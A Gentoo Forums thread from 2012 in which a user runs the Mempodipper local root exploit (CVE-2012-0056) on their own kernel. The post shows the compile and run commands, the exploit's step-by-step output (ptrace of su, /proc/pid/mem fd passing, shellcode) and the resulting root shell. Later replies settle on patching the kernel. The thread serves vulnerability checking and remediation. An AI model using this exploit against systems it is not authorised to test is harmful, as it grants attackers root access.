Gentoo Forums
mempodipper - root exploit [CVE-2012-0056] [SOLVED]
upengan78

Posted: Wed Jan 25, 2012 6:11 pm    Post subject: mempodipper - root exploit [CVE-2012-0056] [SOLVED]

More info:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc

On my Gentoo -

3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux


Code:
user@hostname:/nfs1 $ 12:08 PM]gcc -o mempodipper mempodipper.c
user@hostname:/nfs1 $ 12:08 PM]./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x402240.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12838/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x402234.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),7(lp),10(wheel),18(audio),35(games),1015(qemu)
sh-4.1#uname -a
3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux


Last edited by upengan78 on Wed Jan 25, 2012 7:42 pm; edited 1 time in total
avx

Posted: Wed Jan 25, 2012 6:14 pm

Yeah, umh? Update your kernel, the recent versions (3.1, 3.2.1) are already patched.
_________________
++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.
upengan78

Posted: Wed Jan 25, 2012 7:21 pm

Thanks. I tried 3.1.6 and the exploit worked on it. So I put in 3.2.1-gentoo-r2 and all is good now.